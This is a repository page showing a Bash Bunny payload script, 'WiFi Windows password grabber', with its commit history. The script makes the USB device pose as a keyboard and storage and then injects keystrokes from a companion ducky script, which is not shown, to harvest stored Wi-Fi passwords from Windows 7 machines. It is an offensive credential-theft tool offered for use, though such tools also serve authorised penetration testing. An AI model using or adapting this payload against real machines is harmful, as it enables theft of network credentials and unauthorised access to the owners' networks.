Files
bashbunny-payloads/payloads/library/credentials/WifiGrabber/payload.txt
Aidan Holland 5a77792c1d Update and fix payloads (#277)
* Updated all Payloads for Version 1.2+

Fixed Style Issues on extensions and payloads.
Added GET TARGET_OS to get.sh
Removed and Fixed all uses ducky_helper.sh (Issue #248)
Removed all mention of DUCKY_LANG (Issue #248)
Renamed Payloads with spaces in name
Added an extension to keep Macs Happy
Added a payload for Mac DNS poisoning
Fixed Issue #271 changed wget to curl -o
Implemented PR #268
Implemented PR #273

* Fixed e.cmd

* Fix e.cmd pt2

* Fixed Issues

Fixed issues pointed out by @sebkinne
Fixed styling errors
2017-10-25 11:10:17 +11:00

37 lines
937 B
Bash
Executable File

#!/bin/bash
# @title: WiFi Windows password grabber for the bash bunny
# @author: Silvian Dragan
# @props: Siem, Darren Kitchen
# @version: 1.0
# @target: Windows 7 (not tested for 8 and above)
#
#
# @details: This is a simple Wifi password grabber tested and working for Windows 7
# However this has not been tested on Windows 8 and above and any suggestions and
# improvements are greatly welcomed. Powershell scripting isn't higest skill so
# I'm sure I'll have much to learn.
#
#
# Colors:
# Purple: starts the attack payload
# Green: successful execution
# Red: failure to load dependency ducky script
#
ATTACKMODE HID STORAGE
LED SETUP
GET SWITCH_POSITION
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
QUACK ${SWITCH_POSITION}/ducky_script.txt
LED FINISH
else
LED FAIL
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1
fi